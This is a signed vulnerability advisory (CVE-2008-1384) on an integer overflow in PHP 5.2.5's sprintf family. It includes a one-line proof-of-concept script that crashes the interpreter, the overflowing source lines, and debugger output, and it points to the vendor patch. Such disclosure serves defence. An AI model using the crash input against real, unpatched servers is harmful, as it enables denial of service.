-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]
Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com and SecurityReason.pl
Date:
SecurityReason Research
SecurityAlert Id: 52
CVE-2008-1384
SecurityRisk: Low
Affected Software: PHP 5.2.5 and prior
Advisory URL:
http://securityreason.com/achievement_securityalert/52
Vendor: http://www.php.net
These functions all manipulate strings in various ways. Some more specialized sections can be found in the regular
expression and URL handling sections.
For information on how strings behave, especially with regard to usage of single quotes, double quotes, and escape
sequences, see the Strings entry in the Types section of the manual.
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008
[email protected]:/usr/obj/usr/src/sys/GENERIC i386
cxib# php -v
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
cxib# cat /www/printf.php
<?
sprintf("[%'A2147483646s]\n", "A");
?>
cxib# php /www/printf.php
Segmentation fault (core dumped)
Good. Let's see to formatted_print.c file in php_sprintf_appendstring() function
The main varible what we will see is "npad"
good. npad is 2147483646
—formatted_print.c-start—
req_size = *pos + MAX(min_width, copy_len) + 1;
—formatted_print.c-end—
req_size overflow
—formatted_print.c-start—
if (req_size > *size) {
while (req_size > *size) {
*size <<= 1;
}
PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n", *size));
*buffer = erealloc(*buffer, *size);
}
—formatted_print.c-end—
(req_size > *size) is False
(alignment == ALIGN_RIGHT) is True so
and finish. Let's debug it with gdb
…
0x290fff0c: 'A' <repeats 200 times>…
0x290fffd4: 'A' <repeats 44 times> <Error reading address 0x29100000: Bad address>
0x29100000: <Error reading address 0x29100000: Bad address>
Script will alocated a lot of data to memory.
Tested on:
PHP 5.2.5
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008
[email protected]:/usr/obj/usr/src/sys/GENERIC i386
and
PHP 5.1.6
someone@ultra ~ $ uname -a
NetBSD ultra 3.0.1 NetBSD 3.0.1 (GENERIC) #0: Fri Jul 14 03:47:28 UTC 2006
[email protected]:/home/builds/ab/netbsd-3-0-1-RELEASE/sparc64/200607131826Z-obj/home/builds/ab/netbsd-3-0-1-RELEASE/src/sys/arch/sparc64/compile/GENERIC
sparc64
— 2. Exploit —
SecurityReason will not public official exploit for this issue.
— 3. How to fix —
CVS
http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1120&view=markup
— 4. Greets —
sp3x Infospec p_e_a Chujwamwdupe schain and Stanislav Malyshev (Patch)
— 5. Contact —
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg [NEW KEY]
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg.old [OLD KEY]
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (FreeBSD)
iD8DBQFH4px5W1OhNJH6DMURAmHUAJ4hUxGFzSo8vqCH5QmR17uL5G4HdACfSFiI
w6hfbKzpzFcipScHzuATSME=
=suIH
-----END PGP SIGNATURE-----